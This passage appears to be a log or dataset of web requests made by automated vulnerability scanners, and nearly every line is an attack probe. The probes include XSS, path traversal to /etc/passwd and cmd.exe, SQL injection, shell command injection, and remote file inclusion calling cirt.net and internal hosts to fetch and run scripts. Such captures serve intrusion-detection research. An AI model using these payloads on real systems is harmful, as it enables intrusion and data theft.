content=\"testuhsv=9753\">\n/1qwv2p5p.jsp?<script>document.cookie=\"testvqcy=252;\"</script>\n/htbin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/rbec2ohx.idc?<script>cross_site_scripting.nasl</script>\n/m2fpztty.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ap58k3ci.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/jujgxwav.kspx?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/gabriel's_horn/\n/zroo33l4.nsf?<script>document.cookie=\"testiklc=904;\"</script>\n/ap58k3ci.aspx?<script>cross_site_scripting.nasl</script>\n/cgi-home/cgi-test.exe\n/byrg33fw.fts?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/examples/jsp/sessions/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/examples/jsp/num/kb.cgi?view='&lang=en\n/help.php?q=\"ping;-w;11000;-n;1;1.2.3.4&rem;\n/cgi-exe/vssetcookie.exe\n/9o6g5vkn.asp?<script>cross_site_scripting.nasl</script>\n/l4fz1dqw.cgi?<script>cross_site_scripting.nasl</script>\n/script_path/config.inc.php?_path=http://192.168.202.118:8080/ghl9il??\n/aj3pf49c.idc?<script>document.cookie=\"testnofv=4170;\"</script>\n/main.php?stuff=\\x0duname >q22755156 #\n/main.php?logout=\"del,q74451345&rem,\n/o35zot2r.aspx?<script>cross_site_scripting.nasl</script>\n/script/ident/identification.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/main.php?stuff=;sleep\\x0910\\x09#\n/en-us/hipkz026.nsf?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/q703m78q.pl?<script>document.cookie=\"testvowq=604;\"</script>\n/help.php?q=\"ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/iisadmpwd/..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf..\\xe0\\x80\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/.passwd.vb\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+00+00+00+4e+30+00+00+5e+30+00+00+00+00+00+00+4e+30+00+00++>>esbq\n/examples/jsp/sessions/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/33y9gcqq.php?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/examples/jsp/cal/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+40+00+00+c0+2e+69+64+61+74+61+00+00+00+10+00+00+00+30+00+00++>>ctdn\n/css-scripts/\n/o6ebbirj.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jobdescription/\n/zqqemp6j.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iktok2bw.htm?<script>cross_site_scripting.nasl</script>\n/xfkun1ku.jsp?<script>cross_site_scripting.nasl</script>\n/scripts/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/examples/jsp/colors/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/index.php?news7[\\\"functions\\\"]=http://cirt.net/rfiinc.txt?\n/?<script>document.cookie=\"testziyq=5055;\"</script>\n/scripts/samples/ctguestb.idc\n/help.php?q=\"&del\\x0bq33773559&rem\\x0b\n/scripts/lib/version.phps\n/examples/jsp/jsp2/el/shoutbox.php?conf=../../../../../../../../etc/passwd\n/cgi-bin/index.php?op=default&date=200607' union select 1,1024298013,1,1,1,1,1,1,1,1--&blogid=1\n/examples/jsp/checkbox/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_inohuydx]));die;/*\n/leaderscript/\n/phpmyadmin/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/jw64yq8u.exe?<script>document.cookie=\"testylfu=1313;\"</script>\n/scripts/event_view.php?eid=34 union select 2145271726\n/uc3w3bdi.asp?<script>document.cookie=\"testxllt=9940;\"</script>\n/ygkjkngd.html?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/examples/servlets/servlet/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/scripts/6gl21a1hiz3s.html\n/bl8sefdm.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi.cgi/r.cgi?file=../../../../../../../../../../etc/passwd\n/main.php?logout=';del\\x09q35732238\\x09#\n/rbec2ohx.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/using logon scripts figure 31102332792303/\n/b5xdqgz2.fts?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='\\x0auname\\x09>q88589696\\x09#\n/scripts/wd7crx47eaml.cfm\n/cgi-bin/magiccard.cgi?pa=3dpreview&amp;next=3dcustom&amp;page=3d../../../../../../../../../../etc/passwd\n/p043snfr.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919201\n/examples/jsp/cal/admin/configset.php?settings_dir=/etc/passwd\\x00\n/javascript/sessions.exe\n/javascript/htpasswd.xml\n/applescript samples/\n/cgi-bin/catalog.php?action=category_show&id='\n/cat_scripts/\n/javascript/notifier.exe\n/manager/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/forum.asp?n=/../../../etc/passwd|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/q703m78q.fts?<script>document.cookie=\"testvowq=604;\"</script>\n/examples/jsp/jsp2/el/download.php?language=/etc/passwd\\x00\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.jsp\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1641476209--\n/cgi-bin/pcadmin/login.asp?idadmin='' or 1=1--\n/.../.../.../\n/cgi-bin/cssearch.cgi?command=savesetup&setup=`cat /etc/passwd`\n/javascript/readme.exe\n/javascript/votes.exe\n/en-us/hipkz026.jsp?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/frznctvhi0i5?&\n/7u1pb2xi.php3?<script>document.cookie=\"testlwwz=718;\"</script>\n/main.php?logout=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/templates/prescription\n/examples/jsp/colors/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/pr0n.exe\n/help.php?q=;sleep\\x099\\x09#\n/cgi-bin/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/script_menu/\n/scripts/texis/junk\n/javascript/balances.exe\n/m2fpztty.x?<script>cross_site_scripting.nasl</script>\n/uktranscript/\n/javascript/sbin.exe\n/d5a5renl.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/admin/utilities_confighelp.asp?helpfield=-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2\n/main.php?logout=\"\\x0dsleep\\x0911\\x09#\n/egaet53a.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b5xdqgz2.aspx?<script>cross_site_scripting.nasl</script>\n/javascript/ee.exe\n/manager/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/javascript/ad.exe\n/cgi-bin/index.php?id='union/**/select/**/0,0,579479720,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/cgi-sys/fileseek.cgi?foot=;cat /etc/passwd&head=\n/test.php?evalme=eval($_server[http_x_xconlkohkokev]);\n/scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332010398,1,1,1,1,1,1,1--&blogid=1\n/en-us/account/newsdesk.cgi?t=../../../../../../etc/passwd\n/phpmyadmin/index.php?site=../../../../../../../../etc/passwd\\x00\n/javascript/2002.exe\n/raanw4ia.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331905172\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://cirt.net/rfiinc.txt??\n//a=\"%3cscript%20src=%27http://www.example.com/test?rnd=q92378185%27%3e%3c%2fscript%3e\";document.writeln(unescape(a))\n/n1afe1y6.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/_xuzlr7swn95.cfm\n/_mem_bin/formslogin.asp?url=><script>alert('vulnerable');</script>\n/en-us/hipkz026.exe?<script>document.cookie=\"testyrbs=2855;\"</script>\n/m4kkjf8l.php?<meta http-equiv=set-cookie content=\"testyglc=8988\">\n/scripts/sc877q2pzqne.php3\n/examples/jsp/checkbox/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/cgi/windmail.exe\n/opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\\x00\n/examples/jsp/jsp2/jspx/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/ydexw8by.dll?<script>document.cookie=\"testulex=4996;\"</script>\n/3j8echh0.cgi?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>\n/jackrabbit/search.jsp?q=%\"<script>alert(1331922091)</script>\n/iajtej82.fts?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=q39154777&scr_height=&scr_width=\n/examples/jsp/checkbox/smpwservicescgi.exe\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/examples/jsp/error/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/examples/jsp/sessions/way-board/way-board.cgi?db=/etc/passwd\\x00\n/scripts/www/delivery/ac.php?bannerid=-1331904183+or+1=1+--+';passthru(base64_decode($_server[http_nessus_tqgsxin5]));die;/*\n/s7qus4g3.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cgis/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/page.cgi?../../../../../../../../../../etc/passwd\n/phpmyadmin/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/tyrovghehq.sh+>+/dev/null+&').\"]=1\n/azcrfs8d.aspx?<script>document.cookie=\"testjpdr=9205;\"</script>\n/main.php?stuff=\"&ping;-w;9000;-n;1;1.2.3.4&rem;\n/ywaxntrx.fts?<script>cross_site_scripting.nasl</script>\n/j4drbkil.htm?<script>cross_site_scripting.nasl</script>\n/b1q8bywu.php?<script>cross_site_scripting.nasl</script>\n/view/main/twikiusers?rev=2 |less /etc/passwd\n/examples/jsp/num/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/examples/jsp/jsp2/el/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/main.php?stuff=uname >q62419285 #\n/weq93ppb.dll?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=ping;-w;9000;-n;1;1.2.3.4&rem;\n/webcgi/gw5/gwweb.exe?help=bad-request\n/help.php?q=;del\\x09q16213317\\x09#\n/index.php?news7[\\\"functions\\\"]=@rfiurl\n/index.asp?fid=412585577799'error\n/main.php?logout=ping;-w;10000;-n;1;4.3.2.1|rem;\n/rpc/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/help.php?q='\\x0duname\\x09>q79317735\\x09#\n/apavxugx.cfc?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/liiwypqnoh.sh+>+/dev/null+&'); function v\n/?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/manager/html;jsessionid=ed0aa2d312f1b481ed8142b08949156e?org.apache.catalina.filters.csrf_nonce=a93bfb5c07d765a533dc34533a3ff67d\n/en-us/<script>cross_site_scripting.nasl</script>.fts\n/javascript/shockwave.exe\n/5qnlm5z2.do?<meta http-equiv=set-cookie content=\"testsixi=8451\">\n/phpmyadmin/sendtemp.pl?templ=../../../../../etc/passwd\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=ftr8qa709ryjzezou\n/main.php?logout=ver\\x0b>q96553915&rem\\x0b\n/examples/jsp/sessions/index.php?entry='\n/miz4r5hz.x?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/examples/jsp/sessions/remindpasswd\n/scripts/download.php?language=/etc/passwd\\x00\n/rpxyx07v.cfc?<script>document.cookie=\"testbnli=1975;\"</script>\n/egaet53a.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/search.jsp?q=%\"<script>alert(1332010391)</script>\n/<script>cross_site_scripting.nasl</script>\n/scripts/lrn28issfuqi.php3\n/script_viruses/\n/vac1l5vm.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/xls.exe\n/javascript/copies.exe\n/cgi-perl/a1stats/a1disp3.cgi?../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/recordings/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/bmeun223.nsf?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/main.php?frm_daynight=day&frm_passwd=q35722364&frm_referer=http%3a//192.168.28.202/main.php%3fstuff%3d1985387140&frm_user=&scr_height=&scr_width=\n/examples/jsp/checkbox/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/h5sc3gxy.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/ny1b3qq4.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 920699051--\n/ap58k3ci.htm?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"rm,q64292722&rem,\n/jw64yq8u.dll?<script>document.cookie=\"testylfu=1313;\"</script>\n/scripts/starnet/addons/slideshow_full.php?album_name='1810978145\n/javascript/smtp.exe\n/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/main.php?stuff=\"\\x0arm\\x09q74494385\\x09#\n/en-us/account/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/examples/jsp/colors/search=<script>alert('xss')</script>\n/cacti/misc/audio.php?recording=../version.inc\n/cacti/php.cgi?/etc/passwd\n/eei78ore.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/abouttrialsubscription/\n/subscriptions.sfish\n/../.tar.bz2\n/examples/jsp/colors/index.php?id=urjhxcl19w'\n/cgi-bin/www/delivery/ac.php?bannerid=-1332009302+or+1=1+--+';passthru(base64_decode($_server[http_nessus_zvt2swpn]));die;/*\n/examples/jsp/num/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n<script>document.cookie=\"testviqu=1270;\"</script>\n/main.php?stuff='\\x0drm q65565224 #\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../etc\n/javascript/sample.exe\n/zqqemp6j.x?<script>cross_site_scripting.nasl</script>\n/gvx7m5ti.pl?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/report.php?scriptpath=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/examples/jsp/jsp2/jspx/newsdesk.cgi?t=../../../../../../etc/passwd\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/<script>cross_site_scripting.nasl</script>.asp\n/scripts/tinfo.php?id=1331908710\n/hipkz026.aspx?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/h21y8w52.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/ion-p.exe?page=../../../../../etc/passwd\n/javascript/properties.exe\n/scripts/.wwwacl\n/h4bi26jd.cgi?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz?\n/main.php?logout='uname #\n/examples/jsp/jsp2/el/myevent.php?myevent_path=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\\x00\n/examples/jsp/jsp2/el/bb_func_txt.php?pathtofiles=/etc/passwd\\x00\n/main.php?stuff=';sleep 10 #\n/8t9v8k7x.html?<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/faq.php?cat_id=1' or force_mysql_error='2\n/examples/jsp/sessions/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/i2n4v4rl.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/scripts/api/orders.json?search[instance_eval]=kernel.fail `id`\n/examples/servlets/servlet/index.php?search=<script>foo</script>\n/fastscripts-23/\n/javascript/python.exe\n/stat/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/qhvu0pdg.cfm?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/examples/jsp/jsp2/jspx/themes/program/themesettings.inc.php?themesdir=/etc/passwd\\x00\n/paged'accueil/\n/manager/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/phpmyadmin/documentation.html?\"=1\n/main.php?logout=\"\\x0ddel q11745557 #\n/examples/jsp/jsp2/el/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/eei78ore.aspx?<script>cross_site_scripting.nasl</script>\n/texis.exe/nessus\n/examples/jsp/checkbox/texis.exe/nessus\n/hjdzm96v.cgi?<script>document.cookie=\"testbyqe=7474;\"</script>\n/examples/jsp/num/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/webdav/c99.php?act=f&f=wce.exe&ft=info&d=c:\\\n/a0imiuf1.mscgi?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/en-us/esmozg5d.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/rguest.exe\n/class-pangofontdescription/\n/ht8pn8uq.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/htbin/gw5/gwweb.exe?htmlver=aaa&get-context\n/phpmyadmin/detail.asp?nchannel='1\n/people's republic of china/\n/scripts_livecontent/\n/cgi-perl/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/scripts/index.php?edit=nonexistant1374561915\n/cgi-bin/data/fetch.php?page='\n/en-us/33y9gcqq.pl?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/gy23xnjq.kspx?<script>cross_site_scripting.nasl</script>\n/script/template/index.php?main_page_directory=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>\n/en-us/<script>document.cookie=\"testvlau=8517;\"</script>\n/index.php?id=urjhxcl19w'\n/scripts/\n/cactisearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/main.php?stuff=\"ping;-w;8000;-n;1;1.2.3.4|rem;\n/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd\n/javascript/80.exe\n/main.php?stuff=\"ver\\x0c>q43448647&rem\\x0c\n/shell script gui/\n/en-us/h5sc3gxy.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/sendtemp.pl?templ=../../../../../etc/passwd\n/manager/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id\n/main.php?frm_daynight=day&frm_passwd=q71856358&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=\n/main.php?stuff=\"&del\\x0bq12538123&rem\\x0b\n/javascript/action.exe\n/examples/jsp/jsp2/jspx/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/raanw4ia.jsp?<script>cross_site_scripting.nasl</script>\n/order/login.php?svr_rootscript=http://192.168.202.118:8080/2aibfaczmac8?\n/<script>document.cookie=\"testfutf=1550;\"</script>\n/help.php?q=&ping;-w;10000;-n;1;4.3.2.1&rem;\n//%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd\n/apavxugx.x?<script>document.cookie=\"testdnbh=5237;\"</script>\n/main.php?stuff=&rm;q39916466&rem;\n/1r8cfrlf.x?<script>document.cookie=\"testydan=5106;\"</script>\n/main.php?stuff=;sleep\\x099\\x09#\n/qhvu0pdg.asp?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/javascript/patch.exe\n/en-us/esmozg5d.kspx?<script>cross_site_scripting.nasl</script>\n/web_scripts/\n/javascript/wbboard.exe\n/examples/jsp/cal/profil.php?id=1 <script>foo</script>\n/phpmyadmin/js/scripts.php?load=/etc/passwd\\x00\n/javascript/sysuser.exe\n/scripts/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/ows-bin/texis.exe/junk\n/examples/jsp/jsp2/el/supporter/tupdate.php?groupid=change&sg='\n/examples/jsp/colors/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\\x00\n/d765w06j.idc?<script>cross_site_scripting.nasl</script>\n/postscripttutorial/\n/main.php?stuff=\"ping\\x0c-w\\x0c9000\\x0c-n\\x0c1\\x0c4.3.2.1|rem\\x0c\n/cgi-bin/search.jsp?q=%\"<script>alert(1331918998)</script>\n/javascript/ico.exe\n/script/gestion/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/mv8wxfy9.htm?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=`/etc/passwd`\n/fpnpp5zg.cfc?<meta http-equiv=set-cookie content=\"testyias=101\">\n/examples/servlets/servlet/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/en-us/account/direct.php?rf=/etc/passwd\\x00\n/examples/jsp/checkbox/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/examples/jsp/jsp2/jspx/minis.php?month=../../../../../../etc/passwd\n/examples/jsp/jsp2/el/config.php?path[docroot]=/etc/passwd\\x00\n/iv5vkgam.cgi?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/cgi-bin/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/top.php?stuff=\"del q95826835 #\n/examples/jsp/colors/language.php?data_dir=/etc/passwd\\x00\n/scripts/repost.asp\n/examples/jsp/sessions/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/examples/jsp/checkbox/download.php?language=/etc/passwd\\x00\n/amdahl's_law/\n/subscriptions\n/scripts/index.php?show=../../../../../../../../../../../etc/passwd\\x00\n/subscription_mag2/\n/examples/jsp/sessions/htsearch?exclude=`/etc/passwd`\n/dda2qr7j.jsp?<script>cross_site_scripting.nasl</script>\n/reinventing_\"ids\"/\n/rubrique.asp?no=/etc/passwd\\x00|55|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/popup.php?include_path=/etc/passwd\\x00\n/show_archives.php?template=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/fo564rei.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/miz4r5hz.cfm?<script>document.cookie=\"testviqu=1270;\"</script>\n/\"lindsay lohan\"/\n//<body><script/src=\"http://www.example.com/test?rnd=q56969235\"></script>\n/scripts/list.php\n/javascript/vol.exe\n/awstats/awstats.pl?migrate=|echo;/./tmp/ysooqnjtxq0 > /dev/null &;echo|awstats987387.txt\n/bzuf9ozq.jsp?<script>cross_site_scripting.nasl</script>\n/en-us/h5sc3gxy.htm?<script>cross_site_scripting.nasl</script>\n/0u75ldxq.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&ver\\x0c>q57632929&rem\\x0c\n/bxnyrhmh.asp?<script>document.cookie=\"testmjct=1867;\"</script>\n/tukodz3j.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/legacy.exe\n/examples/jsp/sessions/search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=folder name\n/6n7aacgg.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/db4web_c/dbdirname//etc/passwd\n/javascript/sites.exe\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010419,4,5\n/help.php?q=\"del,q11574297&rem,\n/help.php?q=&ver >q76744966&rem \n/scs86g1p.mscgi?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/x7pclv4s.x?<meta http-equiv=set-cookie content=\"testiulz=3709\">\n/9o6g5vkn.nsf?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/jsp2/jspx/faxsurvey?cat /etc/passwd\n/i686v90l.x?<script>document.cookie=\"testfutf=1550;\"</script>\n/recordings/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/scripts/gm.cgi\n/scripts/2pwudii1mt22.sh\n/cgi-sys/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/main.php?stuff='\\x0dsleep\\x098\\x09#\n/en-us/33y9gcqq.nsf?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/javascript/sun.exe\n/top.php?stuff=\"\\x0adel\\x09q69986769\\x09#\n/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\\\n/scripts/rvckwz6smkqf.inc\n/cgi-home/gw5/gwweb.exe?htmlver=aaa&get-context\n/examples/jsp/sessions/install.php?newlang=../../cpg_error.log\\x00\n/<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/examples/jsp/jsp2/jspx/calendar.php?serverpath=/etc/passwd\\x00\n/nyvbv05h.asp?<script>document.cookie=\"testftxz=5980;\"</script>\n/main.php?logout=\"ping\\xa0-w\\xa07000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/javascript/notes.exe\n/en-us/jnv890lt.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/whosonline.exe\n/main.php?logout=\"ping -w 10000 -n 1 1.2.3.4|rem \n/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/macro toolsworks advanced scripting edition v6/\n/xsqln7eb.exe?<script>document.cookie=\"testpcbb=9254;\"</script>\n/jw64yq8u.html?<script>document.cookie=\"testylfu=1313;\"</script>\n/en-us/odzk29aa.asp?<script>document.cookie=\"testtfvh=2141;\"</script>\n/help.php?q=\"\\x0adel\\x09q43182957\\x09#\n/vgn/login/1,501,,00.html?cookiename=x--\\>\n/top.php?stuff='&del\\x09q76725442\\x09#\n/examples/jsp/error/notify?from=nessus\"|id\"\n/top.php?stuff=\"&ping,-w,11000,-n,1,1.2.3.4&rem,\n/javascript/prop.exe\n/script/fckeditor/editor/dialog/fck_link.html\n/o6ebbirj.aspx?<script>cross_site_scripting.nasl</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php&frm_user=q11158979&scr_height=&scr_width=\n/php scripts pack 2 by www/\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332010390&lang_crm=../../../../../../../../../../../..//boot.ini\\x00\n/nyjgaorz.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"ver >q43721567&rem \n/main.php?logout=\"rm\\x09q86373985&rem\\x09\n/d7ktpmcq.php3?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/search.jsp?q=%\"<script>alert(1331904374)</script>\n/main.php?logout=\"|ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/gy23xnjq.asp?<script>cross_site_scripting.nasl</script>\n/esmozg5d.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cmbpm script v2/\n/7u1pb2xi.jsp?<meta http-equiv=set-cookie 